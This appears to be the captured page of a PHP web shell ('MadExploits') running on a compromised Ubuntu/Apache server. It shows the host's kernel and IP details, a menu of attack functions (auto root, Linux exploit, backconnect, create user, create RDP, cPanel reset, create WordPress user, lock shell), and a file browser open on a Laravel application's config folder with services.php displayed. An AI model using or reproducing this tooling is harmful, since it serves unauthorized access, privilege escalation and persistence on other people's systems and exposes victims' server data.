Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.16.139.36
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cravings /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
app.php
8.62
KB
-rw-rw-r--
auth.php
3.27
KB
-rw-rw-r--
broadcasting.php
1.57
KB
-rw-rw-r--
cache.php
2.64
KB
-rw-rw-r--
database.php
5.03
KB
-rw-rw-r--
filesystems.php
2.08
KB
-rw-rw-r--
hashing.php
1.53
KB
-rw-rw-r--
logging.php
2.17
KB
-rw-rw-r--
mail.php
4.09
KB
-rw-rw-r--
queue.php
2.58
KB
-rw-rw-r--
sentry.php
1.07
KB
-rw-rw-r--
services.php
1.37
KB
-rw-rw-r--
session.php
6.77
KB
-rw-rw-r--
view.php
1004
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : services.php
<?php return [ /* |-------------------------------------------------------------------------- | Third Party Services |-------------------------------------------------------------------------- | | This file is for storing the credentials for third party services such | as Stripe, Mailgun, SparkPost and others. This file provides a sane | default location for this type of information, allowing packages | to have a conventional place to find your various credentials. | */ 'mailgun' => [ 'domain' => env('MAILGUN_DOMAIN'), 'secret' => env('MAILGUN_SECRET'), 'endpoint' => 'api.eu.mailgun.net', ], 'ses' => [ 'key' => env('SES_KEY'), 'secret' => env('SES_SECRET'), 'region' => env('SES_REGION', 'us-east-1'), ], 'sparkpost' => [ 'secret' => env('SPARKPOST_SECRET'), ], 'twitter' => [ 'client_id' => env('TWITTER_APP_ID'), 'client_secret' => env('TWITTER_APP_SECRET'), 'redirect' => env('TWITTER_REDIRECT') ], 'facebook' => [ 'client_id' => env('FACEBOOK_APP_ID'), 'client_secret' => env('FACEBOOK_APP_SECRET'), 'redirect' => env('FACEBOOK_REDIRECT'), ], 'google' => [ 'client_id' => env('GOOGLE_APP_ID'), 'client_secret' => env('GOOGLE_APP_SECRET'), 'redirect' => env('GOOGLE_REDIRECT') ], ];
Close